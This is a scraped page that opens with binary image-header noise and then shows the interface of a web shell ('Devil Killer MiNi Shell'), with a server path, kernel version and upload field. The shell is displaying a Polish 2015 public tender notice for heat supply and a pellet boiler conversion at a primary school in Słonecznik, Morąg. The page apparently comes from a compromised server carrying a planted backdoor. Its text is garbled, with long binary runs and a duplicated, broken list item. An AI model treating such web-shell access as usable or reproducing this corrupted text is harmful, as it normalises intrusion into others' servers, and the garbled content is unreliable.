JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20150616/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20150616/145336-N-2015.html

<p class="kh_header"><b>Morąg: Dostawę energii cieplnej do Szkoły Podstawowej im. Heleny Ponieważ w Słoneczniku, Gmina Morąg</b><br>
<b>Numer ogłoszenia: 145336 - 2015; data zamieszczenia: 16.06.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa w Słoneczniku , Słonecznik 117, 14-300 Morąg, woj. warmińsko-mazurskie, tel. 89 757 00 10, faks 89 757 00 10.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawę energii cieplnej do Szkoły Podstawowej im. Heleny Ponieważ w Słoneczniku, Gmina Morąg.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa energii cieplnej (załącznik nr 3 do SIWZ) do Kotłowni zlokalizowanej w Szkole Podstawowej im. Heleny Ponieważ w Słoneczniku (Słonecznik 117, 14-300 Morąg), poprzedzone przebudową przedmiotowej Kotłowni, polegającą na zaprojektowaniu i wykonaniu prac doprowadzających do wymiany źródła pozyskiwania ciepła z oleju opałowego na nowe paliwo stałe w postaci pelletu drzewnego w celu obniżenia kosztów ogrzewania. Celem przebudowy przedmiotowej Kotłowni jest eksploatacja oparta o racjonalne zasady i taki system obsługi Kotłowni, aby Zamawiający mógł decydować o ilości odbieranego ciepła w zależności od potrzeb, mógł zmienić parametry ogrzewania i miał wpływ na ilość zużywanego ciepła, tzn. ograniczanie dostawy ciepła w uzasadnionych przypadkach i obniżanie parametrów w nocy. Wszelkie roboty, w tym wykonywanie koniecznych prac budowlanych będą przeprowadzane wyłącznie po ich uprzednim uzgodnieniu z Zamawiającym.
1. W zakres dostawy wchodzi:
1.1 Opracowanie koncepcji, zaprojektowanie i wykonanie przebudowy przedmiotowej Kotłowni mającej na celu:
1.1.1	Wymianę palników olejowych na palniki zasilane nowym paliwem stałym w postaci pelletu drzewnego;
1.1.2	Wykonanie prac niezbędnych do zamiany źródła pozyskiwania ciepła z oleju opałowego na nowe paliwo stałe w postaci pelletu drzewnego;
1.1.3	Wprowadzenie harmonogramów pracy podłączonych urządzeń.
Wprowadzone w ramach przebudowy Kotłowni zmiany muszą być odwracalne (możliwość powrotu do systemu ogrzewania olejowego bez konieczności ponoszenia dodatkowych kosztów przez Zamawiającego). Zmiany wprowadzone w Kotłowni nie będą generowały dodatkowych kosztów po stronie Zamawiającego związanych ze zwiększonym zużyciem energii elektrycznej. Wszelkie koszty przebudowy obciążają Wykonawcę. Po zakończeniu realizacji umowy, infrastruktura powstała na skutek modernizacji (przebudowy) przechodzi nieodpłatnie na własność Zamawiającego.
1.2	Całodobowa obsługa i eksploatacja przedmiotowej Kotłowni c.o., w tym:
1.2.1	obsługa kotłów c.o. oraz urządzeń towarzyszących - pompy wodne, odstojniki i inne;
1.2.2	w sezonie grzewczym ogrzewanie obiektów zasilanych z Kotłowni;
1.2.3	zapewnienie dostaw ciepłej wody zgodnie ze zgłoszonym zapotrzebowaniem;
1.2.4	bieżąca konserwacja pieców, pomp, instalacji kotłowej (do rozdzielacza głównego);
1.2.5	przestrzeganie obowiązujących przepisów w zakresie obsługi, eksploatacji Kotłowni, przepisów BHP oraz p. poż.;
1.2.6	przestrzeganie instrukcji obsługi urządzeń Kotłowni;
1.2.7	systematyczne sprzątanie pomieszczeń Kotłowni.
1.3	Utrzymanie w należytym stanie technicznym urządzeń Kotłowni i instalacji kotłowej, zapewniającym ią, bezawaryjną i bezpieczną eksploatację, a w przypadku awarii spowodowanej z winy Wykonawcy usunięcie awarii na własny koszt.
1.4	Nowe zamontowane palniki na paliwo stałe w postaci pelletu drzewnego muszą posiadać gwarancję producenta oraz muszą być wyprodukowane najwcześniej w 2014 roku.
2. Zamawiający przekaże Wykonawcy pomieszczenia przedmiotowej Kotłowni wraz z wyposażeniem w terminie do 7 dni od daty podpisania umowy. 
3. Zamawiający pokryje koszty opłat z tytułu mediów dla potrzeb wytwarzania energii cieplnej tj.: energia elektryczna, woda, ścieki.
4. Wykonawca będzie zobowiązany do pokrycia kosztów napraw zamontowanych przez siebie urządzeń oraz konserwacji udostępnionych pomieszczeń, a także sprzętu w okresie świadczenia usługi, tak aby ich stan na dzień zakończenia świadczenia usługi nie był gorszy, niż stan wynikający z normalnego i prawidłowego użytkowania.
5. Koszty osobowe obsługi przedmiotowej Kotłowni, koszty paliwa, przeglądów kominiarskich, elektrycznych i dozorowych UDT pokrywane będą przez Wykonawcę.
6. Zamawiający zaleca odbycie przez Wykonawcę wizji lokalnej przedmiotowej Kotłowni po uprzednim uzgodnieniu terminu z dyrektorem szkoły.
7. Zamawiający zobowiązuje się do udostępnienia wszelkiej posiadanej dokumentacji technicznej dotyczącej pomieszczeń przedmiotowej Kotłowni i wyposażenia technologicznego niezbędnego dla realizacji zadania.
8. Przekai zadania.
8. Przekazanie pomieszczeń przedmiotowej Kotłowni nastąpi na podstawie podpisanych przez obie strony protokołów zdawczo-odbiorczych.
9. Wynagrodzenie dla Wykonawcy będzie regulowane przez Zamawiającego w formie ryczałtowej, płatnej w cyklu miesięcznym, w równych wartościach dla całej długości kontraktu od daty przekazania pomieszczeń przedmiotowej Kotłowni na podstawie podpisanych przez obie strony protokołów przekazania. Podstawą obliczenia miesięcznej kwoty ryczałtu będzie cena usługi podana przez Wykonawcę do przetargu.
10. Wykonawca dostarczy Zamawiającemu przed odbiorem przebudowy Kotłowni, dokumentację techniczną zamontowanych nowych urządzeń Kotłowni na paliwo stałe w postaci pelletu drzewnego w ramach przebudowy w tym: specyfikacja techniczna producenta, gwarancja producenta, nazwa producenta, model, nr serii produktu, rok produkcji (min. 2014 rok), certyfikaty bezpieczeństwa, etc. 
Pozostały  opis  niniejszego postępowania określony został w szczegółowym opisie przedmiotu zamówienia załącznik nr 3 do SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 09.30.00.00-2, 50.53.11.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 48.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni,  czy wykonawca spełnia warunek udziału w postępowaniu 
na  podstawie  złożonych  wraz  z  ofertą  oświadczeń  oraz  dokumentów.  Ocena 
spełniania  warunku  udziału  w  postępowaniu  zostanie  dokonana  na  zasadzie 
wykonawca spełnia / nie spełnia, zgodnie z rozdziałem VI pkt 1. SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ten warunek, jeżeli wykaże: 1) że w okresie ostatnich trzech 
lat  przed  upływem  terminu  do  składania  ofert,  a  jeżeli  okres  prowadzenia 
działalności  jest  krótszy  -  w  tym  okresie,  wykonał  lub  wykonuje  co  najmniej 
jedną usługę polegającą na dostawie energii cieplnej do obiektów użyteczności 
publicznej z kotłowni własnej lub udostępnionej przez Odbiorcę ciepła o mocy 
minimum  200  kW.  Dostawy  te  powinny  być  wykonane  lub  wykonywane  w 
okresie ostatnich 3 lat przed upływem terminu składania ofert w postępowaniu a 
jeżeli  okres  prowadzenia  działalności  jest  krótszy  to  w  okresie  prowadzonej 
działalności,  z  podaniem  rodzaju,  wartości,  daty  i  miejsca  wykonania  dostaw 
energii  cieplnej.  Wykonawca  załączy  dokumenty  potwierdzające,  że  prace 
zostały wykonane lub są realizowane zgodnie z warunkami umowy, 2) w okresie 
ostatnich 5 lat przed upływem terminu składania ofert w postępowaniu, a jeżeli 
okres  prowadzenia  działalności  jest  krótszy  to  w  okresie  prowadzonej 
działalności  wykonanie  minimum  jednej  budowy  kotłowni  na  paliwo  stałe  w 
postaci pelletu drzewnego o mocy minimum 200 kW lub przebudowy kotłowni 
polegającej na zaprojektowaniu i wykonaniu prac doprowadzających do zmiany 
źródła  pozyskiwania  ciepła  z  oleju  opałowego  bądź  innego  paliwa  na  paliwo 
stałe  w  postaci  pelletu  drzewnego  o  mocy  minimum  200  kW,  z  podaniem 
rodzaju, wartości, daty i miejsca wykonania przedmiotowych prac budowlanych. 
Wykonawca  załączy  dokumenty  potwierdzające,  że  prace  zostały  wykonane 
zgodnie  z  zasadami  sztuki  budowlanej  i  prawidłowo  ukończone.  Wykonawcy 
wspólnie  ubiegający  się  o  udzielenie  zamówienia  muszą  wykazać,  że  łącznie 
spełniają  w/w  warunek.  Zamawiający  oceni,  czy  wykonawca  spełnia  warunek 
udziału w postępowaniu na podstawie złożonych wraz z ofertą oświadczeń oraz 
dokumentów.  Ocena  spełniania  warunku  udziału  w  postępowaniu  zostanie 
dokonana na zasadzie wykonawca spełnia / nie spełnia, zgodnie z rozdziałem VI 
pkt 1. SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni,  czy wykonawca spełnia warunek udziału w postępowaniu 
na  podstawie  złożonych  wraz  z  ofertą  oświadczeń  oraz  dokumentów.  Ocena 
spełniania  warunku  udziału  w  postępowaniu  zostanie  dokonana  na  zasadzie 
wykonawca spełnia / nie spełnia, zgodnie z rozdziałem VI pkt 1. SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca  musi  wykazać,  że  dysponuje:  1.  osobami  posiadającymi 
uprawnienia  budowlane  do  pełnienia  samodzielnych  funkcji  technicznych  w 
budownictwie  zgodnie  z  art.  12,  pkt.  1,  ust.  2  Ustawy  Prawo  budowlane  o 
specjalności:  -  Kierownik  budowy  -  osoba  posiadająca  uprawnienia  do 
wykonywania  samodzielnych  funkcji  technicznych  w  budownictwie  w 
specjalności  konstrukcyjno-budowlanej  lub  inne  uprawnienia  umożliwiające 
wykonywanie tych samych czynności, do wykonywania, których w aktualnym 
stanie  prawnym  uprawniają  uprawnienia  budowlane  w/w  specjalności 
umożliwiające  zrealizowanie  przedmiotowego  zamówienia  -  min.  1  osoba;  - 
Kierownik  robót  -  osoba  posiadająca  uprawnienia  do  wykonywania 
samodzielnych  funkcji  technicznych  w  budownictwie  w  specjalności 
instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wodociągowych, 
kanalizacyjnych i gazowych lub inne uprawnienia umożliwiające wykonywanie 
tych samych czynności, do wykonywania, których w aktualnym stanie prawnym 
uprawniają  uprawnienia  budowlane  w/w  specjalności  umożliwiające 
zrealizowanie przedmiotowego zamówienia - min. 1 osoba; - Kierownik robót - 
osoba  posiadająca  uprawnienia  do  wykonywania  samodzielnych  funkcji 
technicznych  w  budownictwie  w  specjalności  instalacyjnej  w  zakresie  sieci, 
instalacji i urządzeń elektrycznych i elektroenergetycznych lub inne uprawnienia 
umożliwiające wykonywanie tych samych czynności, do wykonywania, których 
w  aktualnym  stanie  prawnym  uprawniają  uprawnienia  budowlane  w/w 
specjalności umożliwiające zrealizowanie przedmiotowego zamówienia - min. 1 
osoba;  2.  osobami  posiadającymi  świadectwo  kwalifikacji  w  zakresie:  - 
eksploatacji i dozoru urządzeń cieplnych - min. 1 osoba; - eksploatacji i dozoru 
instalacji  i  urządzeń  energetycznych  (do  1kV)  -  min.  1  osoba;  Zamawiający 
oceni,  czy wykonawca spełnia warunek udziału w postępowaniu  na podstawie 
złożonych  wraz  z  ofertą  oświadczeń  oraz  dokumentów.  Ocena  spełniania 
warunku  udziału  w  postępowaniu  zostanie  dokonana  na  zasadzie  wykonawca 
spełnia  /  nie  spełnia,  zgodnie  z  rozdziałem  VI  pkt  1.  SIWZ.  Zamawiający 
określając  wymogi  dla  osób  w  zakresie  posiadanych  uprawnień  budowlanych 
dopuszcza  odpowiadające  im  ważne  uprawnienia  budowlane,  które  zostały 
wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające 
uprawnienia  wydane  obywatelom  państw  Europejskiego  Obszaru 
Gospodarczego  oraz  Konfederacji  Szwajcarskiej  z  zastrzeżeniem  art.  12a  oraz 
innych przepisów Prawo budowlane (tekst jednolity Dz. U. z 2006 r. Nr 156 poz. 1118  z  późniejszymi  zm.)  oraz  ustawy  o  zasadach  uznania  kwalifikacji 
zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 
2008  r.,  Nr  63,  poz.  394),  wówczas  wykonawca  na  własny  koszt  zapewni 
tłumacza  języka  polskiego,  który  zapewni  stałe  i  biegłe  tłumaczenie  w 
kontaktach  pomiędzy  Zamawiającym  a  Wykonawcą,  a  także  zapewni 
tłumaczenie  na  bieżąco  wszystkich  dokumentów  związanych  z  realizacją 
przedmiotowego  zamówienia  stworzonych  zarówno  przez  Wykonawcę,  jak  i 
dostarczonych przez Zamawiającego. Wykonawca zatrudniając tłumacza winien 
wziąć pod uwagę, iż z uwagi na złożony zakres przedmiotu zamówienia tłumacz 
ten winien być biegłym w tłumaczeniu zagadnień technicznych, ekonomicznych 
i  prawnych.  Wykonawcy  wspólnie  ubiegający  się  o  udzielenie  zamówienia 
muszą wykazać, że łącznie spełniają w/w warunek.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna,  że  wykonawca  znajduje  się  w  sytuacji  ekonomicznej  i 
finansowej  zapewniającej  wykonanie  zamówienia,  jeżeli  suma  ubezpieczenia 
wynikająca z polisy lub innego dokumentu ubezpieczenia od odpowiedzialności 
cywilnej  w  zakresie  prowadzonej  działalności  gospodarczej  związanej  z 
przedmiotem  zamówienia  nie  będzie  niższa  niż:  100.000,00  zł.  W  przypadku 
składania  oferty  wspólnej  (konsorcjum)  ww.  dokumenty  składa  każdy  z 
wykonawców  składających  ofertę  wspólną.  Warunek  wysokości  sumy 
ubezpieczenia  zostanie  uznany  przez  zamawiającego  za  spełniony,  jeżeli 
wykonawcy  składający  ofertę  wspólną  będą  spełniać  go  łącznie.  Zamawiający 
oceni,  czy wykonawca spełnia warunek udziału w postępowaniu  na podstawie 
złożonych  wraz  z  ofertą  oświadczeń  oraz  dokumentów.  Ocena  spełniania 
warunku  udziału  w  postępowaniu  zostanie  dokonana  na  zasadzie  wykonawca 
spełnia / nie spełnia, zgodnie z rozdziałem VI pkt 1. SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony i podpisany formularz ofertowy 2. W przypadku wspólnego ubiegania się o 
udzielenie zamówienia przez kilku wykonawców - wykonawca winien załączyć do oferty 
pełnomocnictwo podpisane przez wszystkie podmioty wspólnie ubiegające się o udzielenie 
zamówienia,  złożone  w  formie  oryginału  lub  notarialnie  potwierdzonej  kopii.  3.  W 
przypadku  ustanowienia  przez  Wykonawcę  pełnomocnika,  do  oferty  należy  załączyć 
oryginał  udzielonego  pełnomocnictwa  lub  notarialnie  potwierdzoną  jego  kopię.  Z  treści 
pełnomocnictwa  musi  jednoznacznie  wynikać  zakres  umocowania  do  czynności 
związanych z postępowaniem o udzielenie zamówienia publicznego, w szczególności do 
podpisania  i  złożenia  oferty.  4.  Wykonawca  może  polegać  na  wiedzy  i  doświadczeniu, 
potencjale  technicznym,  osobach  zdolnych  do  wykonania  zamówienia  ,  zdolnościach 
finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego 
łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić 
zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w 
szczególności  przedstawiając  w  tym  celu  pisemne  zobowiązanie  tych  podmiotów  do 
oddania  mu  do  dyspozycji  niezbędnych  zasobów  na  potrzeby  wykonania  zamówienia. 
Wyżej wymienione pisemne zobowiązania innych podmiotów należy do oferty załączyć w 
oryginale.  Z  treści  powyższego  zobowiązania  podmiotu  trzeciego  (oświadczenia)  lub 
innego  dokumentu  potwierdzającego  udostępnienie  zasobów  przez  inne  podmioty  musi 
bezspornie i jednoznacznie wynikać w szczególności: 1) kto jest podmiotem przyjmującym 
zasoby,  2)  jaki  jest  zakres  dostępnych  wykonawcy  zasobów  innego  podmiotu  3)  w  jaki 
sposób  zostaną  wykorzystane  zasoby  innego  podmiotu  przez  wykonawcę,  przy 
wykonywaniu  zamówienia,  4)  jakiego  charakteru  stosunki  będą  łączyły  wykonawcę  z 
